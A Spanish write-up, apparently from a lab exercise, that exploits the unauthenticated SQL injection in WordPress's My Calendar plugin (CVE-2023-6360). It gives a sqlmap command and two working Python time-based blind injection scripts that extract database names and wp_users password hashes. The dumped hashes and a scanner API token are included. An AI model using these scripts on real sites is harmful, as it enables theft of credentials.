Plugin MyCalendar

---

WordPress: Inyección SQL no autenticada (CVE-2023–6360)

WordPress MyCalendar Plugin — Unauthenticated SQL Injection(CVE-2023–6360)Medium

---

• Para un mayor enumeramiento de vulnerabilidades tenemos que obtener una API_key de la propia pagina de WordPress:

wpscan --url http://examen.thlcpptv16.thl/ --api-token='dYCf5i7HPW37WfNYDH9CjYaWeW54BfmHFHcI9ig17B4'

• Y además nos identifica algunos usuarios.

Podemos observar en la salida del escaneo, que existe un plugin vulnerable llamado My Calendar v3.4.22. Dicho plugin es vulnerable a SQL Inejction y sin necesidad de autenticación previa.

Podemos leer más acerca de esta vulnerabilidad en los siguientes elnaces:

• https://www.tenable.com/security/research/tra-2023-40

• https://wpscan.com/vulnerability/2b5860f1-f029-496a-a479-082b78c5bda4/

---

Usando sqlmap:

sqlmap -u "http://examen.thlcpptv16.thl/?rest_route=/my-calendar/v1/events&from=1*" -D wordpress -T wp_users -C user_pass --dump --batch

---

Usando python:

Extración de Base de Datos mediante inyección SQL basada en tiempo.

#!/usr/bin/python3

import requests
import signal
import sys
import time
from pwn import *

def def_handler(sig, frame):
    print("\n\n[!] Saliendo...\n")
    sys.exit(1)

# Ctrl+C
signal.signal(signal.SIGINT, def_handler)

main_url = "http://examen.thlcpptv16.thl/"

def makeSQLi():
    p1 = log.progress("Fuerza bruta")
    p1.status("Iniciando proceso de fuerza bruta")

    time.sleep(2)

    p2 = log.progress("Datos extraídos: ")
    extracted_info = ""

    for limit in range(0, 5):
        if limit > 0:
            extracted_info += ','

        for position in range(1, 25):
            for character in range(33, 127):  # ASCII range
                sqli_url = main_url + f"?rest_route=/my-calendar/v1/events&from=1' AND (SELECT 1 FROM (SELECT IF(ASCII(SUBSTRING(schema_name,{position},1))={character},SLEEP(1),0) FROM information_schema.schemata LIMIT {limit},1)a) AND 'a'='a"

                # Realizar la solicitud sin imprimir cada consulta
                try:
                    res = requests.get(sqli_url, timeout=5)  # Timeout para evitar tiempos largos de espera
                    res.raise_for_status()  # Raise error si la respuesta es mala

                    # Si el tiempo de respuesta es mayor a 1 segundo, es una indicación de éxito
                    if res.elapsed.total_seconds() > 1:
                        extracted_info += chr(character)  # Extraer la letra
                        p2.status(extracted_info)  # Mostrar el progreso con las letras extraídas
                        break  # Salir del bucle de caracteres para la posición actual

                except requests.exceptions.RequestException as e:
                    p1.status(f"Error al realizar la solicitud: {e}")
                    continue  # Continuar con el siguiente intento

    # Guardar los datos extraídos en un archivo
    with open('databases.txt', 'w') as f:
        f.write(extracted_info)

if __name__ == '__main__':
    makeSQLi()

Sacando las tablas de la BD WORDPRESS:

#!/usr/bin/python3

import requests
import signal
import sys
import time
import string
from pwn import *

def def_handler(sig, frame):
    print("\n\n[!] Saliendo...\n")
    sys.exit(1)

# Ctrl+C
signal.signal(signal.SIGINT, def_handler)

characters = string.digits + string.ascii_lowercase + string.ascii_uppercase + '.$/'

main_url = "http://examen.thlcpptv16.thl/"
def makeSQLi():
    p1 = log.progress("Fuerza bruta")
    p1.status("Iniciando proceso de fuerza bruta")

    time.sleep(2)

    p2 = log.progress("Datos extraídos: ")
    extracted_info = ""
    
    for limit in range(0,3):
        if limit > 0:
            extracted_info += ','
        
        last_position_char = 0
        for position in range(1, 36):
            for character in characters:
                char = ord(character)
                sqli_url = main_url + f"?rest_route=/my-calendar/v1/events&from=1' AND (SELECT IF(ASCII(SUBSTRING(user_pass,{position},1))={char},SLEEP(1),0) FROM wordpress.wp_users LIMIT {limit},1) AND 'a'='a"

                p1.status(sqli_url)
            
                res = requests.get(sqli_url)

                if res.elapsed.total_seconds() > 1:
                    extracted_info += character
                    last_position_char = position
                    p2.status(extracted_info)
                    break
                elif (position - last_position_char) > 1:
                    break

    f = open('databases.txt', 'w')
    f.write(extracted_info)
    f.close()

if __name__ == '__main__':
    makeSQLi()

---

examinador:$P$B43UAoTTnv0stdbxGqzwyQtyXm86x/1
jerry:$P$B0uohNeAjd6aq3n0dv6NC7Nhkro0Kt.
tom:$P$BJrv/Sv/rBlufcIW5FiMdUW4lA5UrN1

---